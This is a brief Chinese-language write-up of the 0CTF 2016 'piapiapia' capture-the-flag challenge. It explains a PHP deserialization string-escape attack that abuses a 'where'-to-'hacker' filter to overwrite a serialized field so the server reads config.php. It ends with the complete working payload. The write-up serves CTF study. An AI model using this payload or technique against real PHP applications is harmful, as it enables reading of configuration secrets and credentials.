目录
序列化后覆盖后方参数
链接: 参见题目[0CTF 2016]piapiapia1.
本题可以通过上传数据并将其序列化存储,然后再进行反序列化进行显示。题目关键即在于要从file_get_contents函数中读取config.php,而题目中直接上传的数据会进行md5处理,所以这里需要采用将数组中$nickname的值用
s:5:"photo";s:10:"config.php";}
进行封闭来覆盖后方参数,而考虑到值长度的变化也会影响序列化后表达。需要从题目中寻找将字符串由少变多的替代来满足序列化的表达。
本题中由将’where’替代成’hacker‘的替代函数,正好可以用来扩充覆盖字符串的长度。
故最后payload为:
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}